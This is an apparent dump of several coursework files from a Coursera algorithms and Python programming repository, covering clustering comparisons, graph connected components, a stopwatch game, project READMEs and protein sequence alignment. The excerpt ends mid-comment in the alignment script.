"num_lines": 359,
"path": "/Fundamentals of Computing Specialization/Algorithmic Thinking (Part 2)/Module 3/alg_application3_solution.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nContains the answers to all the questions for \nApplication #3 - Comparision of Clustering Algorithm\n\"\"\"\n\nimport random\nimport copy\nimport matplotlib.pyplot as plt\nimport time\nimport alg_cluster\nimport alg_clusters_matplotlib as clust_plt\nimport alg_project3_solution as pj3_sol\nimport alg_project3_viz as pj3_viz\n\n######################################################\n##### Code for Q1 Solution #####\n# Q1: Write a function gen_random_clusters(num_clusters) that creates \n# a list of clusters where each cluster in this list corresponds to one \n# randomly generated point in the square with corners (+/-1,+/-1). Use \n# this function and your favorite Python timing code to compute the \n# running times of the functions slow_closest_pair and fast_closest_pair \n# for lists of clusters of size 2 to 200. Once you have computed the running \n# times for both functions, plot the result as two curves combined in a single \n# plot. (Use a line plot for each curve.) The horizontal axis for your plot \n# should be the the number of initial clusters while the vertical axis should \n# be the running time of the function in seconds. Please include a legend in \n# your plot that distinguishes the two curves.\n\ndef gen_random_clusters(num_clusters):\n \"\"\"[summary]\n \n Arguments:\n num_clusters {[type]} -- [description]\n \n Returns:\n [type] -- [description]\n \"\"\"\n\n # initialize the cluster list to be returned\n cluster_lst = num_clusters * [0]\n\n for idx in range(num_clusters):\n # generate a random point between -1 and 1\n horz_center = random.uniform(-1.0, 1.0)\n vert_center = random.uniform(-1.0, 1.0)\n # create the cluster and add it to the list\n cluster_lst[idx] = alg_cluster.Cluster(set(), horz_center, vert_center, 1, 0)\n\n return cluster_lst\n\n# intialize the range of cluster size to be used \nclust_lens = range(2, 200)\n# intialize the fast and slow pair function times \ntime_slow_closest = []\ntime_fast_closest = []\n\n# clsts = gen_random_clusters(4)\n# print len(clsts)\n# print pj3_sol.slow_closest_pair(clsts)\n\n# calcualte the time to run the slow and fast functions for the closest pair\nfor clust_len in clust_lens:\n\n # generate the cluster list of size clust_lsn\n cluster_list = gen_random_clusters(clust_len)\n\n # calculate the closest pair in the cluster using slow algorithm and \n # store the time it takes to run the function for given cluster size\n start = time.time()\n pj3_sol.slow_closest_pair(cluster_list)\n end = time.time()\n time_slow_closest.append((end - start))\n # calculate the closest pair in the cluster using fast algorithm and \n # store the time it takes to run the function for given cluster size\n start = time.time()\n pj3_sol.fast_closest_pair(cluster_list)\n end = time.time()\n time_fast_closest.append((end - start))\n\n# plot the graphs of resilience vs number of nodes removed for each of the 3 graphs\n#plt.figure(1)\nplt.plot(clust_lens, time_slow_closest, '-b', label = 'slow_closest_pair')\nplt.plot(clust_lens, time_fast_closest, '-k', label = 'fast_closest_pair')\nplt.title('slow vs fast runtime of closest pair function in Visual Studio' )\nplt.xlabel('length of clusters')\nplt.ylabel('run times[sec]')\nplt.legend(loc = 'upper left')\nplt.xlim(2, 200)\nplt.ylim(0, None)\nplt.grid()\nplt.show()\n# uncommet to save the plot \n#plt.savefig(\"Q1_closest_pair_comparision.png\")\n\n\n######################################################\n# ##### Code for Q2 Solution #####\n# Use alg_project3_viz to create an image of the 15 clusters generated by applying \n# hierarchical clustering to the 3108 county cancer risk data set. You may submit \n# an image with the 3108 counties colored by clusters or an enhanced visualization \n# with the original counties colored by cluster and linked to the center of their \n# corresponding clusters by lines. You can generate such an enhanced plot using our\n# alg_clusters_matplotlib code by modifying the last parameter of plot_clusters to be\n# True. Note that plotting only the resulting cluster centers is not acceptable\n\n# load the data\ndata_table = pj3_viz.load_data_table(pj3_viz.DATA_3108_URL)\n\n# generate cluster from the data\nsingleton_list = []\nfor line in data_table:\n singleton_list.append(alg_cluster.Cluster(set([line[0]]), line[1], line[2], line[3], line[4]))\n\n# create a deep copy since hierarchical_clustering modifies the references to the list\nsingleton_list_cpy = copy.deepcopy(singleton_list) \n\n# form clusters based on hierarchical clustering algorithm\ncluster_list = pj3_sol.hierarchical_clustering(singleton_list_cpy, 15)\nprint \"Displaying\", len(cluster_list), \"hierarchical clusters\" \n\n# generate the image for the 15 clusters formed using hierarchical clustering algorithm\nclust_plt.plot_clusters(data_table, cluster_list, True)\n\n######################################################\n##### Code for Q3 Solution #####\n# Use alg_project3_viz to create an image of the 15 clusters generated by applying 5 \n# iterations of k-means clustering to the 3108 county cancer risk data set. You may \n# submit an image with the 3108 counties colored by clusters or an enhanced visualization \n# with the original counties colored by cluster and linked to the center of their corresponding \n# clusters by lines. As in Project 3, the initial clusters should correspond to the 15 counties \n# with the largest populations.\n\n# form clusters based on k-mean clustering algorithm\ncluster_list = pj3_sol.kmeans_clustering(singleton_list, 15, 5)\nprint \"Displaying\", len(cluster_list), \"k-mean clusters\" \n\nclust_plt.plot_clusters(data_table, cluster_list, True)\n\n######################################################\n##### Q4 Solution #####\n# Which clustering method is faster when the number of output clusters is either a small \n# fixed number or a small fraction of the number of input clusters? Provide a short \n# explanation in terms of the asymptotic running times of both methods. You should assume \n# that hierarchical_clustering uses fast_closest_pair and that k-means clustering always \n# uses a small fixed number of iterations.\n#\n# Ans: let k = number of clusters\n# n = size of the input cluster_list\n# q = number of iterations (for k-mean clustering)\n\n# Then for hierarchical clustering, the time complexity is O((n - k) * (n * logn + n * (logn)^2)\n# which is ~ O(n^2 * (logn)^2) if k is small compared to n as stated in the above question\n\n# On the other hand, the time complexity of k-mean clustering is ~ O(q * n * k). Since k is small\n# compared to n and q is also a small fixed number, time complexity is O(n) which is much more\n# efficient than heirarchiacl clustering \n\n######################################################\n##### Q5 Solution #####\n# Use alg_project3_viz to create an image of the 9 clusters generated by applying hierarchical \n# clustering to the 111 county cancer risk data set. You may submit an image with the 111 \n# counties colored by clusters or an enhanced visualization with the original counties colored \n# by cluster and linked to the center of their corresponding clusters by lines.\n\n# load the data\ndata_table = pj3_viz.load_data_table(pj3_viz.DATA_111_URL)\n\n# generate cluster from the data\nsingleton_list = []\nfor line in data_table:\n singleton_list.append(alg_cluster.Cluster(set([line[0]]), line[1], line[2], line[3], line[4]))\n\n# create a deep copy since hierarchical_clustering modifies the references to the list\nsingleton_list_cpy = copy.deepcopy(singleton_list) \n# form clusters based on hierarchical clustering algorithm\ncluster_list_hierarc = pj3_sol.hierarchical_clustering(singleton_list_cpy, 9) \n\n# generate the image for the 9 clusters formed using hierarchical clustering algorithm\nprint \"Displaying\", len(cluster_list_hierarc), \"hierarchical clusters\" \nclust_plt.plot_clusters(data_table, cluster_list_hierarc, True)\n\n######################################################\n##### Q6 Solution #####\n# Use alg_project3_viz to create an image of the 9 clusters generated by applying 5 \n# iterations of k-means clustering to the 111 county cancer risk data set. You may \n# submit an image with the 111 counties colored by clusters or an enhanced visualization \n# with the original counties colored by cluster and linked to the center of their \n# corresponding clusters by lines. As in Project 3, the initial clusters should correspond \n# to the 9 counties with the largest populations.\n\n# form clusters based on k-mean clustering algorithm\ncluster_list_kmean = pj3_sol.kmeans_clustering(singleton_list, 9, 5)\n\n# generate the image for the 9 clusters formed using k-means clustering algorithm\nprint \"Displaying\", len(cluster_list_hierarc), \"k-mean clusters\" \nclust_plt.plot_clusters(data_table, cluster_list_kmean, True)\n\n######################################################\n##### Q7 Solution #####\n# Write a function compute_distortion(cluster_list) that takes a list of clusters and \n# uses cluster_error to compute its distortion. Now, use compute_distortion to compute \n# the distortions of the two clusterings in questions 5 and 6\n\ndef compute_distortion(cluster_list, data_table):\n\n distortion = sum([cluster.cluster_error(data_table) for cluster in cluster_list])\n\n return distortion\n\nprint compute_distortion(cluster_list_hierarc, data_table)\nprint compute_distortion(cluster_list_kmean, data_table)\n\n######################################################\n##### Q8 Solution #####\n# Examine the clusterings generated in Questions 5 and 6. In particular, focus your \n# attention on the number and shape of the clusters located on the west coast of the USA.\n# Describe the difference between the shapes of the clusters produced by these two methods \n# on the west coast of the USA. What caused one method to produce a clustering with a much \n# higher distortion? To help you answer this question, you should consider how k-means \n# clustering generates its initial clustering in this case.\n#\n# Ans: For the k-mean clustering(Figure 5) we can see that the 3 cluster centers are located \n# in the california region (one in northern while two in southern region) while of the 3 \n# centers for the hierarchical clustering one is located in Washington state and two in the \n# california region. The high distortion for the k-mean is due to the fact that the counties \n# in the cluster with center in the northern California is distrbuted in Washington and \n# southern California i.e the counties are much further than the center. The difference between \n# the distortion values is becauses the intial clustering method for k-mean involves clustering \n# around counties with highest population. Due to this all 3 counties(3 largest circles are black \n# and pink) in the southern California were included in the intial clustering while none from \n# Washington, Oregon or Northern California was selected. Thus this resulted in relatively \n# higher distortion.\n\n######################################################\n##### Q9 Solution #####\n# Based on your answer to Question 8, which method (hierarchical clustering or k-means \n# clustering) requires less human supervision to produce clusterings with relatively \n# low distortion?\n#\n# Ans: based on Q8, we say that hierarchical clustering requires less human supervision\n# as it requires only choosing the number of ouput clusters. While on the other hand\n# for k-mean we need a good choice of the intial cluster centers.\n\n######################################################\n##### Q10 Solution #####\n\nhierarc_distortion = 15 * [0]\nkmean_distortion = 15 * [0]\nnum_clusters_range = range(20, 5, -1)\n\n## do the calculations for 111 data set\n# load the data\ndata_table = pj3_viz.load_data_table(pj3_viz.DATA_111_URL)\n\n# generate cluster from the data\nsingleton_list = []\nfor line in data_table:\n singleton_list.append(alg_cluster.Cluster(set([line[0]]), line[1], line[2], line[3], line[4]))\n\nsingleton_list_cpy = copy.deepcopy(singleton_list) \n\nfor num_clusters in num_clusters_range:\n cluster_list_hierarc = pj3_sol.hierarchical_clustering(singleton_list_cpy, num_clusters)\n cluster_list_kmean = pj3_sol.kmeans_clustering(singleton_list, num_clusters, 5)\n hierarc_distortion[num_clusters - 6] = compute_distortion(cluster_list_hierarc, data_table)\n kmean_distortion[num_clusters - 6] = compute_distortion(cluster_list_kmean, data_table) \n\n# reverse the num_cluster_range\nnum_clusters_range.reverse()\n\n# plot the graphs for distortion for two clustering method for 111 counties\n#plt.figure(2)\nplt.plot(num_clusters_range, kmean_distortion, '-b', label = 'kmean')\nplt.plot(num_clusters_range, hierarc_distortion, '-k', label = 'hierarchical')\nplt.title('distortion for kmean vs hierarchical clustering for 111 counties' )\nplt.xlabel('number of clusters')\nplt.ylabel('distortion')\nplt.legend(loc = 'upper right')\nplt.xlim(6, 20)\nplt.ylim(0, None)\nplt.grid()\nplt.show()\n\n## do the calculations for 290 data set\n# load the data\ndata_table = pj3_viz.load_data_table(pj3_viz.DATA_290_URL)\n\n# generate cluster from the data\nsingleton_list = []\nfor line in data_table:\n singleton_list.append(alg_cluster.Cluster(set([line[0]]), line[1], line[2], line[3], line[4]))\n\nnum_clusters_range = range(20, 5, -1)\nsingleton_list_cpy = copy.deepcopy(singleton_list) \n\nfor num_clusters in num_clusters_range:\n cluster_list_hierarc = pj3_sol.hierarchical_clustering(singleton_list_cpy, num_clusters)\n cluster_list_kmean = pj3_sol.kmeans_clustering(singleton_list, num_clusters, 5)\n hierarc_distortion[num_clusters - 6] = compute_distortion(cluster_list_hierarc, data_table)\n kmean_distortion[num_clusters - 6] = compute_distortion(cluster_list_kmean, data_table) \n\n# reverse the num_cluster_range\nnum_clusters_range.reverse()\n\n# plot the graphs for distortion for two clustering method for 290 counties\n#plt.figure(3)\nplt.plot(num_clusters_range, kmean_distortion, '-b', label = 'kmean')\nplt.plot(num_clusters_range, hierarc_distortion, '-k', label = 'hierarchical')\nplt.title('distortion for kmean vs hierarchical clustering for 290 counties' )\nplt.xlabel('number of clusters')\nplt.ylabel('distortion')\nplt.legend(loc = 'upper right')\nplt.xlim(6, 20)\nplt.ylim(0, None)\nplt.grid()\nplt.show()\n\n## do the calculations for 896 data set\n# load the data\ndata_table = pj3_viz.load_data_table(pj3_viz.DATA_896_URL)\n\n# generate cluster from the data\nsingleton_list = []\nfor line in data_table:\n singleton_list.append(alg_cluster.Cluster(set([line[0]]), line[1], line[2], line[3], line[4]))\n\nnum_clusters_range = range(20, 5, -1)\nsingleton_list_cpy = copy.deepcopy(singleton_list) \n\nfor num_clusters in num_clusters_range:\n cluster_list_hierarc = pj3_sol.hierarchical_clustering(singleton_list_cpy, num_clusters)\n cluster_list_kmean = pj3_sol.kmeans_clustering(singleton_list, num_clusters, 5)\n hierarc_distortion[num_clusters - 6] = compute_distortion(cluster_list_hierarc, data_table)\n kmean_distortion[num_clusters - 6] = compute_distortion(cluster_list_kmean, data_table) \n\n# reverse the num_cluster_range\nnum_clusters_range.reverse()\n\n# plot the graphs for distortion for two clustering method for 290 counties\n#plt.figure(3)\nplt.plot(num_clusters_range, kmean_distortion, '-b', label = 'kmean')\nplt.plot(num_clusters_range, hierarc_distortion, '-k', label = 'hierarchical')\nplt.title('distortion for kmean vs hierarchical clustering for 896 counties' )\nplt.xlabel('number of clusters')\nplt.ylabel('distortion')\nplt.legend(loc = 'upper right')\nplt.xlim(6, 20)\nplt.ylim(0, None)\nplt.grid()\nplt.show()\n\n######################################################\n##### Q11 Solution #####\n# For each data set (111, 290, and 896 counties), does one clustering method consistently \n# produce lower distortion clusterings when the number of output clusters is in the range \n# 6 to 20? Is so, indicate on which data set(s) one method is superior to the other.\n#\n# Ans: for 111 counties, hierarchical clustering consistently produces less clusteriing\n# For other two data set, there is no one method that consistently produces lower distorion"
},
{
"alpha_fraction": 0.561347246170044,
"alphanum_fraction": 0.6012429594993591,
"avg_line_length": 29.9743595123291,
"blob_id": "e6f574976dce5083336c589d847e2cc6a83276c0",
"content_id": "7e2440ac1d4385a3f68fe531d0a1d0ca0d048e15",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5002,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 156,
"path": "/Algorithms on Graphs/Assignment1/connected_components.cpp",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "// file: connected_components.cpp\r\n// author: Shamsuddin Rehmani\r\n// date: 2016-07-02\r\n// description: Problem 2 of the first assignment of Algorithms on Graphs\r\n//\t\t\t\tby University of California, San Diego & Higher School of Economics on Coursera\r\n//\r\n//\t\t\t\tThe task was : Given an undirected graph with n vertices and m edges, compute \r\n//\t\t\t\tthe number of connected component in it.\r\n// \r\n//\t\t\t\tStarter file with main function was already provided but implementation of\r\n//\t\t\t\treach and number_of_components functions and testing had to be completed\r\n//\t\t\t\t\r\n//\t\t\t\tThe file passed all 20 test on Coursera with\r\n//\t\t\t\tmax time used: 0.01/1.00 sec, max memory used: 7.77/512 bytes. \r\n\r\n#include <iostream>\r\n#include <vector>\r\n\r\nusing std::vector;\r\nusing std::pair;\r\n\r\n// Recursively finds all neighbours reachable from x using depth first search \r\n// and updates there visited status to true\r\n//\r\n// PRE: 1 ≤ adj.size() ≤ 10e3; 0 ≤ x ≤ adj.size()-1; visited.size() = adj.size()\r\n// POST: updates the visited status for all neighbours reachable from x to true \r\n// PARAM: adj = an undirected graph represented in adjacancey list with n vertices and 2*m edges where n is adj.size() \r\n// visited = keeps track of all the vertices that have already been visited\r\n// x = a vertice of adj for which we want to find the reachable neighbour vertices.\r\n\r\nvoid reach(vector<vector<int> > &adj, vector<bool> &visited, int x) {\r\n\r\n\tvisited[x] = true;\r\n\r\n\tfor (vector<int>::size_type v = 0; v < adj[x].size(); v++) {\r\n\r\n\t\tif (visited[adj[x][v]] == false) {\r\n\r\n\t\t\treach(adj, visited, adj[x][v]);\r\n\r\n\t\t}\r\n\t}\r\n\r\n}\r\n\r\n// Finds the total number of connected components of the graph adj using helper function reach\r\n// defined above.\r\n//\r\n// PRE: 1 ≤ adj.size() ≤ 10e3; visited.size() = adj.size();\r\n// POST: returns the number of total connected components by finding the reachable neighbours for all vertice of adj\r\n// PARAM: adj = an undirected graph represented in adjacancey list with n vertices and 2*m edges where n is adj.size() \r\n// visited = keeps track of all the vertices that have already been visited\r\n\r\nint number_of_components(vector<vector<int> > &adj, vector<bool> visited) {\r\n\r\n\tint res = 0;\r\n\r\n\t// iterate for all vertices of the graph\r\n\tfor (vector<int>::size_type v = 0; v < adj.size(); v++) {\r\n\r\n\t\tif (visited[v] == false) { // if vertice v has not yet been visited\r\n\t\t\treach(adj, visited, v); // update all reachable vertices from v \r\n\t\t\t++res;\t\t\t\t\t// and increment the result\r\n\t\t}\r\n\t}\r\n\r\n\treturn res;\r\n}\r\n\r\nint main() {\r\n\r\n\t// Few test case to check if the number_of_components function works. These are commented since the \r\n\t// assignment requires the connected_components.cpp file to read input values and output the respective\r\n\t// results on the console\r\n\t/**************************************************************************************\r\n\r\n\r\n\t//Test 1 : graph with 8 vertices, 4 edges. 4 connected components\r\n\tvector<bool> visited1(8, false);\r\n\tvector<vector<int> > adj1(8, vector<int>());\r\n\r\n\r\n\tadj1[4 - 1].push_back(1 - 1);\r\n\tadj1[1 - 1].push_back(4 - 1);\r\n\tadj1[1 - 1].push_back(2 - 1);\r\n\tadj1[2 - 1].push_back(1 - 1);\r\n\r\n\tadj1[1 - 1].push_back(3 - 1);\r\n\tadj1[3 - 1].push_back(1 - 1);\r\n\r\n\tadj1[3 - 1].push_back(4 - 1);\r\n\tadj1[4 - 1].push_back(3 - 1);\r\n\r\n\tadj1[7 - 1].push_back(8 - 1);\r\n\tadj1[8 - 1].push_back(7 - 1);\r\n\r\n\tif (number_of_components(adj1, visited1) != 4)\r\n\t\tstd::cout << \"Test 1 failed\" << std::endl;\r\n\r\n\t//Test 2 : graph with 8 vertices, 0 edges. 8 connected components\r\n\tvector<bool> visited2(8, false);\r\n\tvector<vector<int> > adj2(8, vector<int>());\r\n\r\n\r\n\tif (number_of_components(adj2, visited2) != 8)\r\n\t\tstd::cout << \"Test 2 failed\" << std::endl;\r\n\r\n\t//Test 3 : graph with 8 vertices, 7 edges. 1 connected components\r\n\tvector<bool> visited3(8, false);\r\n\tvector<vector<int> > adj3(8, vector<int>());\r\n\r\n\r\n\tadj3[1 - 1].push_back(2 - 1);\r\n\tadj3[2 - 1].push_back(1 - 1);\r\n\r\n\tadj3[2 - 1].push_back(3 - 1);\r\n\tadj3[3 - 1].push_back(2 - 1);\r\n\r\n\tadj3[3 - 1].push_back(4 - 1);\r\n\tadj3[4 - 1].push_back(3 - 1);\r\n\r\n\tadj3[4 - 1].push_back(5 - 1);\r\n\tadj3[5 - 1].push_back(4 - 1);\r\n\r\n\tadj3[5 - 1].push_back(6 - 1);\r\n\tadj3[6 - 1].push_back(5 - 1);\r\n\r\n\tadj3[6 - 1].push_back(7 - 1);\r\n\tadj3[7 - 1].push_back(6 - 1);\r\n\r\n\tadj3[7 - 1].push_back(8 - 1);\r\n\tadj3[8 - 1].push_back(7 - 1);\r\n\r\n\tif (number_of_components(adj3, visited3) != 1)\r\n\t\tstd::cout << \"Test 3 failed\" << std::endl;\r\n\r\n\r\n\tsystem(\"PAUSE\");\r\n\r\n\t**************************************************************************************/\r\n\t// The code below was mostly provided as a part of the starter file for the assignment with few modifications\r\n\r\n\tsize_t n, m;\r\n\tstd::cin >> n >> m;\r\n\tvector<vector<int> > adj(n, vector<int>());\r\n\tvector<bool> visited(n, false);\r\n\tfor (size_t i = 0; i < m; i++) {\r\n\t\tint x, y;\r\n\t\tstd::cin >> x >> y;\r\n\t\tadj[x - 1].push_back(y - 1);\r\n\t\tadj[y - 1].push_back(x - 1);\r\n\t}\r\n\tstd::cout << number_of_components(adj, visited);\r\n\r\n\r\n}\r\n"
},
{
"alpha_fraction": 0.6371584534645081,
"alphanum_fraction": 0.6688524484634399,
"avg_line_length": 26.328357696533203,
"blob_id": "eecc939545bc5f3dd9b88fe486d6f655a0f8e20c",
"content_id": "a29ab8c4cb1a73bca28b3871e652862bbfede8d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1830,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 67,
"path": "/Fundamentals of Computing Specialization/Interactive Programming in Python (Part 1)/Mini-Project3 Stopwatch The Game/stop_watch.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "import simplegui\n\n# define global variables\ncountTenthOfSec = 0\nsuccessStops = 0\ntotStops = 0\n\n# define helper function format that converts time\n# in tenths of seconds into formatted string A:BC.D\ndef format(t):\n #get the tenth of the second digit\n D = t % 10\n #get the total seconds\n t = t / 10\n #convert seconds to minutes\n A = t/60\n #store the remaining seconds after converting to minutes\n BC = t % 60\n #get the unit digit of the seconds\n C = BC % 10\n #get the tens digit of the seconds\n B = (BC - C)/10\n \n return (str(A) + \":\" + str(B) + str(C) + \".\" + str(D))\n \n# define event handlers for buttons; \"Start\", \"Stop\", \"Reset\"\ndef start_button_handler():\n timer.start()\n \ndef stop_button_handler():\n global totStops, successStops\n if (timer.is_running()):\n timer.stop()\n totStops += 1\n if (not(countTenthOfSec % 10)):\n successStops +=1\n\ndef reset_button_handler():\n global countTenthOfSec, totStops, successStops\n timer.stop()\n countTenthOfSec = 0\n totStops = 0\n successStops = 0\n\n# define event handler for timer with 0.1 sec interval\ndef timer_handler():\n global countTenthOfSec\n countTenthOfSec += 1\n\n# define draw handler\ndef draw(canvas):\n canvas.draw_text(format(countTenthOfSec), (100, 175), 50, 'White')\n canvas.draw_text(str(successStops) + \"/\" + str(totStops), (250,50), 30, 'White')\n\n# create frame\nframe = simplegui.create_frame(\"Stop Watch\", 300,300)\n\n# register event handlers\ntimer = simplegui.create_timer(100, timer_handler)\nframe.set_draw_handler(draw)\nstartButton = frame.add_button('start', start_button_handler, 100)\nstopButton = frame.add_button('stop', stop_button_handler, 100)\nresetButton = frame.add_button('reset', reset_button_handler,100)\n\n# start frame\nframe.start()\ntimer.start()"
},
{
"alpha_fraction": 0.8011226654052734,
"alphanum_fraction": 0.8051323294639587,
"avg_line_length": 137.6666717529297,
"blob_id": "309816911d18497d35dc4488d8ae42a86c64df93",
"content_id": "903243fad010c238ba3c67b31faacf5b882a62ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1247,
"license_type": "no_license",
"max_line_length": 414,
"num_lines": 9,
"path": "/Fundamentals of Computing Specialization/Interactive Programming in Python (Part 2)/Mini-Project8 RiceRocks(Asteroids)/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #8 - RiceRocks\n\nImplemented a simple version of the classic arcade game Asteroids in CodeSkulptor, a browser-based Python interpreter, as part of the coursework. To play the game go [here](http://www.codeskulptor.org/#user46_dzLwwfibjR_8.py) and press the play button on the top left corner. A window will pop up and will require the clicking it to start the game. \nTurn on the volume to hear the game music and sounds. To navigate the spaceship use the arrow keys and to fire missiles use the spacebar. As the game progresses, the speed of rocks spawning will increase to make the game more competitive\n\nMini-project overview taken from course page can be found below:\n* For our last mini-project, we will complete the implementation of RiceRocks, an updated version of Asteroids, that we began last week. You should add the splash screen image that you dismiss with a mouse click before starting this mini-project. We strongly recommend using Chrome for this mini-project since Chrome's superior performance will become apparent when your program attempts to draw dozens of sprites.\n\nComplete Mini-Project Description can be found at: <https://www.coursera.org/learn/interactive-python-2/supplement/GjfKF/mini-project-description>"
},
{
"alpha_fraction": 0.7475035786628723,
"alphanum_fraction": 0.7746077179908752,
"avg_line_length": 99.14286041259766,
"blob_id": "a380ce8efdffbe32f890bb4d5199b48bbecf9815",
"content_id": "cc5d1e819903199556254a74c7d7d7e485733e67",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1402,
"license_type": "no_license",
"max_line_length": 643,
"num_lines": 14,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 1)/Mini-Project1 2048(Merge)/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #1 - 2048(Merge)\n\nImplemented the merge function to be used in the next project for the 2048 game logic.\n\nLink to my solution:\n<http://www.codeskulptor.org/#user46_Hn6NfnDEFx_13.py>\n\nMini-project overview taken from course page can be found below:\n* 2048 is a simple grid-based numbers game. The object of the game is to combine tiles with the same number to make larger numbered tiles. You \"win\" when you create a 2048 tile. In the first two assignments, we will implement a version of the 2048 game. Although the original game is played on a <a href=\"https://www.codecogs.com/eqnedit.php?latex=4&space;\\times&space;4\" target=\"_blank\"><img src=\"https://latex.codecogs.com/gif.latex?4&space;\\times&space;4\" title=\"4 \\times 4\" /></a> grid, your version should be able to have an arbitrary height and width. In this first assignment,we will focus on only one aspect of the game: merging tiles.\n\n* We have provided the following [template](http://www.codeskulptor.org/#poc_2048_merge_template.py) that contains the basic code that you will need to implement the merge function. The signature (name and parameters) of the functions in this file must remain unchanged, but you may add any additional functions or other code that you need to.\n\nComplete project description can be found at : \n<https://www.coursera.org/learn/principles-of-computing-1/supplement/1baei/mini-project-description>\n"
},
{
"alpha_fraction": 0.6559500098228455,
"alphanum_fraction": 0.667113184928894,
"avg_line_length": 48.35537338256836,
"blob_id": "90f42e33d35cb73f319c2a60d394a31c670f1823",
"content_id": "9459c8b05165a841a1c58cfe88244b1018e328a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17916,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 363,
"path": "/Fundamentals of Computing Specialization/Algorithmic Thinking (Part 2)/Module 4/alg_application4_solution.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nAll answers to questions in Application #4 -\nApplications to Genomics and Beyond\n\"\"\"\n\nimport random\nimport matplotlib.pyplot as plt\nimport alg_application4_provided as alg_app4_prov\nimport alg_project4_solution as alg_proj4_sol\n\n##########################################################################\n# Solution Q1\n\n# Q1: First, load the files HumanEyelessProtein and FruitflyEyelessProtein \n# using the provided code. These files contain the amino acid sequences that \n# form the eyeless proteins in the human and fruit fly genomes, respectively. \n# Then load the scoring matrix PAM50 for sequences of amino acids. This scoring\n# matrix is defined over the alphabet {A,R,N,D,C,Q,E,G,H,I,L,K,M,F,P,S,T,W,Y,V,B,Z,X,-} \n# which represents all possible amino acids and gaps (the \"dashes\" in the alignment).\n# Next, compute the local alignments of the sequences of HumanEyelessProtein and \n# FruitflyEyelessProtein using the PAM50 scoring matrix and enter the score and \n# local alignments for these two sequences below. Be sure to clearly distinguish \n# which alignment is which and include any dashes ('-') that might appear in the \n# local alignment.\n\n# load the two amino acid sequences that form the eyeless proteins in the human \n# and fruit fly genomes\nhuman_seq = alg_app4_prov.read_protein(alg_app4_prov.HUMAN_EYELESS_URL)\nfly_seq = alg_app4_prov.read_protein(alg_app4_prov.FRUITFLY_EYELESS_URL)\n\n# load their scoring matrix\nscoring_matrix = alg_app4_prov.read_scoring_matrix(alg_app4_prov.PAM50_URL)\n\n# compute the local alignments matrix for these 2 sequences\nlocal_align_matrix = alg_proj4_sol.compute_alignment_matrix(human_seq, fly_seq, scoring_matrix, False)\n\n# compute the local alignments and the score for the two sequences\n(score_q1, align_human, align_fly) = alg_proj4_sol.compute_local_alignment(human_seq, \n fly_seq, scoring_matrix, \n local_align_matrix)\n\nprint \"Q1 Answers: \" \nprint \"Score: \",score_q1\nprint \"local alignment of human: \", align_human\nprint \"local alignment of fly: \", align_fly\nprint \n\n##########################################################################\n# Solution Q2 \n# Q2: To continue our investigation, we next consider the similarity of the two \n# sequences in the local alignment computed in Question 1 to a third sequence. \n# The file ConsensusPAXDomain contains a \"consensus\" sequence of the PAX domain;\n# that is, the sequence of amino acids in the PAX domain in any organism. In this \n# problem, we will compare each of the two sequences of the local alignment computed \n# in Question 1 to this consensus sequence to determine whether they correspond to \n# the PAX domain.\n#\n# Load the file ConsensusPAXDomain. For each of the two sequences of the local \n# alignment computed in Question 1, do the following:\n# \n# - Delete any dashes '-' present in the sequence.\n# - Compute the global alignment of this dash-less sequence with the ConsensusPAXDomain \n# sequence.\n# - Compare corresponding elements of these two globally-aligned sequences (local vs. \n# consensus) and compute the percentage of elements in these two sequences that agree.\n\n# load the file ConsensusPAXDomain\npax_domain_seq = alg_app4_prov.read_protein(alg_app4_prov.CONSENSUS_PAX_URL)\n\n# delete the dashes from the 2 local alignments in Q1\nhum_nodash_seq = align_human.replace('-', \"\")\n\n# compute the global alignments matrix for PAX domain and local human alignment seq with no dash\nglob_align_mat_hum_pax = alg_proj4_sol.compute_alignment_matrix(pax_domain_seq, hum_nodash_seq, \n scoring_matrix, True)\n \n# compute the global alignment matrix for the PAX domain and local fly alignment seq with no dash\nglob_align_mat_fly_pax = alg_proj4_sol.compute_alignment_matrix(pax_domain_seq, align_fly, \n scoring_matrix, True)\n\n(_, align_pax_hum, align_hum_nodash) = alg_proj4_sol.compute_global_alignment(pax_domain_seq, \n hum_nodash_seq, \n scoring_matrix, \n glob_align_mat_hum_pax)\n\n(_, align_pax_fly, align_fly_nodash) = alg_proj4_sol.compute_global_alignment(pax_domain_seq, \n align_fly, \n scoring_matrix, \n glob_align_mat_fly_pax)\n\ncount_pax_hum = 0.0\ncount_pax_fly = 0.0\n\n\nfor charc_i, charc_j in zip(align_pax_hum, align_hum_nodash):\n if charc_i == charc_j:\n count_pax_hum += 1\n\nprint \"Q2 Answers: \" \nprint (\"percentage of elments global alignment of local human vs PAX that agree: \" +\n str(round(count_pax_hum/len(align_pax_hum) * 100, 2)) + \"%\")\n\nfor charc_i, charc_j in zip(align_pax_fly, align_fly_nodash):\n if charc_i == charc_j:\n count_pax_fly += 1 \n\nprint (\"percentage of elments global alignment of local fly vs PAX that agree: \" +\n str(round(count_pax_fly/len(align_pax_fly) * 100, 2)) + \"%\")\nprint\n\n##########################################################################\n# Solution Q3\n# Q3: Examine your answers to Questions 1 and 2. Is it likely that the level of \n# similarity exhibited by the answers could have been due to chance? In particular, \n# if you were comparing two random sequences of amino acids of length similar to \n# that of HumanEyelessProtein and FruitflyEyelessProtein, would the level of agreement \n# in these answers be likely? To help you in your analysis, there are 23 amino acids \n# with symbols in the string \"ACBEDGFIHKMLNQPSRTWVYXZ\". Include a short justification \n# for your 